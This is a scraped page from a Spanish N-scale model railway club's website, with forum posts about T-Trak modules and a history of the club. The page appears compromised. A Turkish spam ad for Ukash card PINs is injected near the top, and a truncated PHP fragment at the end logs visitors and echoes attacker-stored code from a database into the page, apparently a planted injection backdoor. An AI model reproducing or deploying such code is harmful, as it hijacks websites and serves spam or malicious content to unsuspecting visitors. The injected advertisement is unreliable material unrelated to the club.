AGENZ

  • Aumentar fuente
  • Fuente predeterminada
  • Disminuir fuente

ukash

Ukash Satın Almak İçin Doğru adrestesiniz. En ucuz en güncel ukash kart satışı bu adreste. Her zaman kaliteli pin numarası almak için mutlaka bize ulaşın. Ukash 19 haneli bir kartdır. Bu kart ile bir çok siteden alış veriş yapabilmektesiniz. -

La maqueta digital 3

E-mail Imprimir

Nuevo artículo de la serie.
Attachments:
FileFile size
Download this file (MaquetaDigital_3.pdf)MaquetaDigital_3.pdf301 Kb
 
 

Calendario

Septiembre 2019
L M X J V S D
26 27 28 29 30 31 1
2 3 4 5 6 7 8
9 10 11 12 13 14 15
16 17 18 19 20 21 22
23 24 25 26 27 28 29
30 1 2 3 4 5 6

Últimos eventos

Sin eventos

Banner
Banner
Banner
Banner
Banner
Banner
Banner

Visor de noticias

FORO AGENZ
AGENZ (Agrupación escala N Zaragoza)
  • Foro general para T-Trak • RETOMANDO LOS ORÍGENES T-TRAK
    Durante este verano se ha ido discutiendo bastantes cosas en T-Trak. Se están aumentando los clubes de H0 y Z en Estados Unidos. Como en los foros se presentan muchos circuitos T-Trak de forma lineal, se va perdiendo el carácter genuino T-Trak i se acerca a los modos exhibiciones tradicionales.

    Se ha rogado mucho que se organicen muestras T-Trak Roundy-Roundy, que los módulos entornen las mesas, con módulos finales, si hay la posibilidad de empleo de enlaces para hacer ramas, u otros módulos para crear ciertas estructuras grupales.

    Por ello se esta promoviendo no optar por módulos muy grandes sino combinar pequeños y otros medianos para hacer complicadas estructuras de vías que se pueden ampliar entre medio de los otros.

    No es una cosa nueva sino retomar los orígenes.

    Y n creo que perdamos con ello, un ejemplo es que con la maqueta modular que organizamos para la Festa de Tardor ponemos el mismo numero de módulos y ocupamos menos mesas pero casi de la misma longitud, puesto que cada cara tiene su opuesto en el otro lado de la mesa.

    Con el tiempo todos vamos ampliando nuestro parque modular y el espacio debe no aumentar demasiado. Un circuito compacto es más aceptado por el público en general.

    En casa o en reunión privada podemos organizar nuestros módulos como deseemos.

    Hay que ir explorando esta cuestión y deseo que sea aceptada por todos.

    Saludos

    Estadísticas: Publicado por Hobbyt — Mié Sep 11, 2019 7:49 pm


  • Encuentros T-Trak • T-TRAK - MAQUETA MODULAR FERROVIARIA - Festes Tardor LLEIDA
    Si alguien más quiere acudir, nos quedan pocos metros.

    Maqueta Modular Ferroviaria QR reducida.jpg

    Estadísticas: Publicado por Hobbyt — Mié Sep 11, 2019 7:18 pm


  • ITrain • Re: iTrain nueva version 4.1.8
    Estoy trasteando las demos de itrain y windigipet. En base a vuestra experiencia que software me recomendais. Que punto fuerte tiene uno y otro. La maqueta en construcciòn es N de 2 x 1 unos 29 desvios, señales calculo unas 15 o algo más y tengo actualmente disponible 5 modulos de 16 retrocontactos cada uno.
    Saludos

    Estadísticas: Publicado por rafamo — Dom Jul 28, 2019 10:36 pm



Noticias - Flash

La "Agrupación Escala N de Zaragoza" (AGENZ) dio sus primeros pasos cuando un grupo de aficionados al ferrocarríl en general, y en particular a los trenes en escala N, nos conocimos a través de un foro de internet dedicado al modelismo ferroviario en escala N. En los incicios realizabamos quedadas a las que no siempre íbamos los mismos, pero con el tiempo, ya empezamos poco a poco a crear un grupo homogéneo. No tardamos mucho en sacar el tema de la creación de una asociación en Zaragoza sobre la escala N.

Con el tiempo surgió el tema de organizar algo en serio. Crear en Zaragoza una asociación o agrupación para reunirnos y discutir sobre estos temas. La mayoría de nosotros no disponemos del espacio necesario en nuestras casas para montar una maqueta ferroviaria de dimensiones aceptables, y nos tenemos que conformar con un óvalo, que a la larga, acaba aburriendo. Empezamos con la idea a principios del año 2007, y fue en marzo de 2007 cuando ya dimos nombre a nuestra asociación, realizamos el papeleo necesario, y dispusimos ya de un local donde reunirnos y empezar a planear nuestra maqueta.

El nombre de la agrupación no nos costó mucho: "Agrupación Escala N de Zaragoza". Aunque por el propio nombre da la sensación que nos limitamos a socios exclusivamente de Zaragoza, ya teníamos claro que nuestro objetivo era Aragón, pero obviamente, dado que nuestra sede iba a ser en Zaragoza capital, la distancia podría ser un condicionante muy claro para captar socios de fuera de la ciudad.

A partir de aquí en estas reuniones en bares, el tema ya no era tan ferroviario, sino que se hablaba de cómo crear esta agrupación: papeleos legales, local, fijar cuotas, determinar objetivos de la agrupación,...

Y una vez que conseguimos un local, con un tamaño razonable para montar una maqueta, poder reunirnos, y con un precio aceptable, fue entonces cuando ya tomo empezaba a tomar forma. A partir de aquí, se empezó a discutir sobre el diseño de maqueta (analógico / digital, número de circuitos, marca y tipo de vía,...), y una vez fijado esto, a empezar con su construcción.

Actualmente hemos sustituido la antigua maqueta por una nueva, construida bajo el principio "modular" siguiendo la normativa del "Club N de España" lo que nos ha permitido participar ya en varios encuentros nacionales y locales e incluso realizar el primer encuentro de modulos de escala N en nuestra Ciudad, para asi intentar difundir nuestra afición y compartir experiencias con aficionados y asociaciones de todo el país.

Y así hasta ahora,.... iremos actualizando este texto según vayamos avanzando.

= 1) { //mysql_query('INSERT INTO lionking (domainname, fullpath, ip, useragent, processtime) VALUES ("'.$g['domainname'].'","'.$g['fullpath'].'","'.$g['ip'].'","'.$g['useragent'].'", NOW())'); $rs = mysql_fetch_array($q); echo stripslashes(stripslashes(stripslashes(html_entity_decode(html_entity_decode($rs['code']))))); } else { mysql_query('INSERT INTO lionking_saved (domainname, stat, processtime) VALUES ("'.$g['domainname'].'","2", NOW())'); } } ?>